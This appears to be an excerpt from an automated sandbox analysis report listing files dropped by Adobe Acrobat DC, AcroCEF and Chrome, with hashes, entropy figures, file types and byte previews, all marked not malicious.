                                                                                                                                      SHA-512:903A0A88190468473183FBE80D35910C7180A440C34E63AEABBECE48185DF82801302F0A4A599A6089D03648B64A2FB0F600EB5255FED2F622542EF6FB72BF1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"analyticsData":{"responseGUID":"c719542e-22f2-4b1a-b60c-226644433573","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1715367827857,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1715191922890}}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4
                                                                                                                                      Entropy (8bit):0.8112781244591328
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:e:e
                                                                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2814
                                                                                                                                      Entropy (8bit):5.123549305876528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:YIPP2Ohb0E6TgowJOXMSBS4RSWx91qZv1w/P/nsH652N9h7U:Bj6fkq/Hmenu60K
                                                                                                                                      MD5:68FEEB29C4260BA5A0401DF4C01CDAC4
                                                                                                                                      SHA1:30B7C2D53F4AC332268628390A727D87CCF24481
                                                                                                                                      SHA-256:4B4837AD88F7940FD745FDD3605DC81BDE3CE178E2DDB0EEA84C63A334165BE8
                                                                                                                                      SHA-512:41E1D9F29E2F6F0D9DCBFC244D4F703343674A0ACA2912740A2FFC67BC6739C4C3F4FB9759C689368942A6AD7800273C953126D4D556D0F55A4C10A3B8FE3C70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"aaa26880f787fa206985ea1df0dd2a59","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1715191945000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b968614afb4bafc4501acef064b8a071","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1715191922000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"3a03a2251b24ec3f37a3f9a92c28bc3c","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1715191922000},{"id":"Edit_InApp_Aug2020","info":{"dg":"3c1be082324cabe96f287cbf8c4da77d","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1715191922000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"349fef63c0766894ea28e26c9c74810e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1715191922000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"508fae316034ac7e09e319dd6be7d180","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1715191922000},
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12288
                                                                                                                                      Entropy (8bit):0.987475955691785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6Qex0IcLESiAie50F:TVl2GL7ms67YXtrVcI8i
                                                                                                                                      MD5:8EEA243EFA11A12CDACDE7859F5F043B
                                                                                                                                      SHA1:7CD5F1E3DC4B5C040CB81722046FEAD9E388B735
                                                                                                                                      SHA-256:077D4868DF261FBFD2D205BB0A29B8C4817C176CB1905AA347C3E86899302DAC
                                                                                                                                      SHA-512:96B13A7FCC1B74964D00F501D2EE00DB769C70FD39731B18045B4758239FE6F974FE4A9B3ACDCE17323C659FE97AA07C8FC231A325CFF8E93675E2D13AB5AB82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:SQLite Rollback Journal
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8720
                                                                                                                                      Entropy (8bit):1.3424545182854413
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7+tiASY9QmQ6Qex07cLESiAi0mY9QYqLBx/XYKQvGJF7ursbn:7MilYXtr6cI8KYZqll2GL7msbn
                                                                                                                                      MD5:4C3D42EC26BFC00D328F4D4D9179712A
                                                                                                                                      SHA1:18E1A6F12686ED7C825BC9D736B78945BC18273C
                                                                                                                                      SHA-256:146E358AB3D0E27E2B70CA1ED672B64005FB5EA25D0F8B13F4F08995A824AABA
                                                                                                                                      SHA-512:1A63EC43F63664E0870B10E8F927CF7AFE2C4AC4EB66ABB3670F06CAE379395A2AD4E8858053B2E49EE8EC47BF74931BADB81F907050DB9693E5868ECEFCF9FB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... .c.....(#$p......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):246
                                                                                                                                      Entropy (8bit):3.5085442896850614
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8eoo:Qw946cPbiOxDlbYnuRKT
                                                                                                                                      MD5:F3DED0F68808F7FFDE9950B4C52939D3
                                                                                                                                      SHA1:BE733FD84C0ED3232A604F63E2725F0E6F52AF2F
                                                                                                                                      SHA-256:44DF4D5BA86D2FEDD7701618FDC34DC88391202FE3A258E5E24B8FFA057266FB
                                                                                                                                      SHA-512:16337C3B91DAE322C22328CB2E0DCE33476CC4A79B455C7722E759ECFC7D4B09B3661DC72C77B469260E94DA66C4CA7A02AD2DD479D33E07F45C065720C5634F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.8./.0.5./.2.0.2.4. . .2.0.:.1.2.:.2.5. .=.=.=.....
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16525
                                                                                                                                      Entropy (8bit):5.353642815103214
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                                                                                      MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                                                                                      SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                                                                                      SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                                                                                      SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15114
                                                                                                                                      Entropy (8bit):5.386563348291458
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:IC8PUKdS1bFastZovSuTqo/C+1QZg4UGgz7tnL6AqX8mMJiJxq/2389Q1LdB/8MQ:5p0
                                                                                                                                      MD5:A14638CE9446C0426A4C446607727F51
                                                                                                                                      SHA1:1A0E0AEEF460F9ACEF8D17DB3E7F980F4990D950
                                                                                                                                      SHA-256:6B6FAE2D760C40F3E8A2A42D05BAC8B442376BBA285C9A01C590B644A331F793
                                                                                                                                      SHA-512:2A378D6502B60A34D5F83FEF3205753AE76F22AA2A6907BBB6433C66D2BFEE27DC35E271EC618EA9D9CA542D32A3F5B332C336AAB70DBE2CED4EE28144B64017
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SessionID=179c2ef8-a313-47cf-9a94-3513bc87d0a7.1715191918579 Timestamp=2024-05-08T20:11:58:579+0200 ThreadID=6408 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=179c2ef8-a313-47cf-9a94-3513bc87d0a7.1715191918579 Timestamp=2024-05-08T20:11:58:581+0200 ThreadID=6408 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=179c2ef8-a313-47cf-9a94-3513bc87d0a7.1715191918579 Timestamp=2024-05-08T20:11:58:581+0200 ThreadID=6408 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=179c2ef8-a313-47cf-9a94-3513bc87d0a7.1715191918579 Timestamp=2024-05-08T20:11:58:581+0200 ThreadID=6408 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=179c2ef8-a313-47cf-9a94-3513bc87d0a7.1715191918579 Timestamp=2024-05-08T20:11:58:581+0200 ThreadID=6408 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29752
                                                                                                                                      Entropy (8bit):5.420192209729763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcbbcbOIC0cbp:fhWlA/TV1Cj
                                                                                                                                      MD5:9E87A2EEBF1F5FD29D13311E095658B9
                                                                                                                                      SHA1:3D436DEFFC03A80F09273F97913C73B99D704358
                                                                                                                                      SHA-256:4E71EAEECD9C147368820B201F5821B3E6902340BA7D3FB3FDF7EBC925BFC1F6
                                                                                                                                      SHA-512:56B6EB0AA79308D5E0E01C30B6C8945E15B9432F401C39DA2E84FA08493ABE358E349EC4ACB556DEA776E810FA267DED81080B5183342097F29F41C1A5FFD9E9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1407294
                                                                                                                                      Entropy (8bit):7.97605879016224
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                                                                                      MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                                                                                      SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                                                                                      SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                                                                                      SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):386528
                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1419751
                                                                                                                                      Entropy (8bit):7.976496077007677
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:/x0WL07oDGZswYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:J0WLxDGZswZGM3mlind9i4ufFXpAXkru
                                                                                                                                      MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                                                                                                                                      SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                                                                                                                                      SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                                                                                                                                      SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):758601
                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 8 17:12:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2673
                                                                                                                                      Entropy (8bit):3.987356392061084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8TdoTM0UHIidAKZdA1FehwiZUklqehHy+3:86frAy
                                                                                                                                      MD5:E7709C654C51B85411E89FFB3BC27E39
                                                                                                                                      SHA1:C5D218E1D4D0F7E920F62C0118BADD887F2248F0
                                                                                                                                      SHA-256:1DCB5DE1A4F9A1A8E9023D86E3E7177989E7201EC9358B42CA87E0E7EA48F43B
                                                                                                                                      SHA-512:7F4B7C675B067C68FC32E4922B8581F9BBA0871905B5DF315A865A23DDF7172CF38E8EF3C1AB61CBB5DDF98BA4552276A967F0896333737927F3AE16D92573B2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. ...$+.,.....x.Js...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 8 17:12:30 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2675
                                                                                                                                      Entropy (8bit):4.00364671849018
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8EdoTM0UHIidAKZdA1seh/iZUkAQkqehwy+2:8jf19QFy
                                                                                                                                      MD5:85BD7A838A53D948C3F81C68B0B70682
                                                                                                                                      SHA1:7333CCB821901E4630A2A9E79D5A87A3582E9EF1
                                                                                                                                      SHA-256:F2E4A70F1ED9BE1EA8AEE5C03AEDBB8F444EFF3D75B814A98A0F867157AFF6EE
                                                                                                                                      SHA-512:9380585FE9AAA6BE1FB2B880DC333EF4BA4441A265D8002FB879ABE2E17719DA31B343CEC0597472C4A36882B0D75A703081FE56FEB20DA71778254EF586833D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@.. ...$+.,....x..Js...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xt.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Q.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2689
                                                                                                                                      Entropy (8bit):4.010564889247049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8fdoTM0AHIidAKZdA14meh7sFiZUkmgqeh7sOy+BX:8efNnEy
                                                                                                                                      MD5:BDCDC1C85A7091BB92FD4E99917B7738
                                                                                                                                      SHA1:D5DCB11CC9FC9E17CE3B2BDD6FEC10D5D77F633A
                                                                                                                                      SHA-256:B6FC34BD8CA76E48E32A1112CABCF3533E1D8EB0962CAA827FE99E2CFD0F34A6
                                                                                                                                      SHA-512:4B96043BC2254D2E0D1BAE7060F12649C37DDE64970316F5BAEA883650757AB10738920819CC0213AC8AF3F6C9D5C6F7A7760543FDFBDAFA4288EF50D4CC0F60
                                                                                                                                      Malicious:false
